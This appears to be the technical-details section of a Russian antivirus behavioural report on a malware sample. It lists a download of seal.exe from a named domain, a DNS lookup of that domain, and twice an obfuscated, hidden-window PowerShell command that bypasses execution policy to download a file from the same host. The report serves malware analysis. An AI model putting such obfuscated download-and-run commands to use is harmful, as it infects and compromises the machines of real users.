Техническая информация
- http://kesigcse.org/uploadedfiles/seal.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^e^rS^HeLL.e^Xe^ -E^XeC^U^T^I^o^nPoliC^y ^b^y^paS^s^ -no^p^rOFilE ^-wI^NDo^wStYl^E h^iDD^e^N^ (NEW^-O^bjec^T^ SYStem^.n^ET.w^eBc^LIE^N^t)^.^DOWnlOAdf^iLe('http://kesigcse.org/Upl...
- DNS ASK ke###cse.org
- '<SYSTEM32>\cmd.exe' /c "pOw^e^rS^HeLL.e^Xe^ -E^XeC^U^T^I^o^nPoliC^y ^b^y^paS^s^ -no^p^rOFilE ^-wI^NDo^wStYl^E h^iDD^e^N^ (NEW^-O^bjec^T^ SYStem^.n^ET.w^eBc^LIE^N^t)^.^DOWnlOAdf^iLe('http://kesigcse.org/Upl...' (со скрытым окном)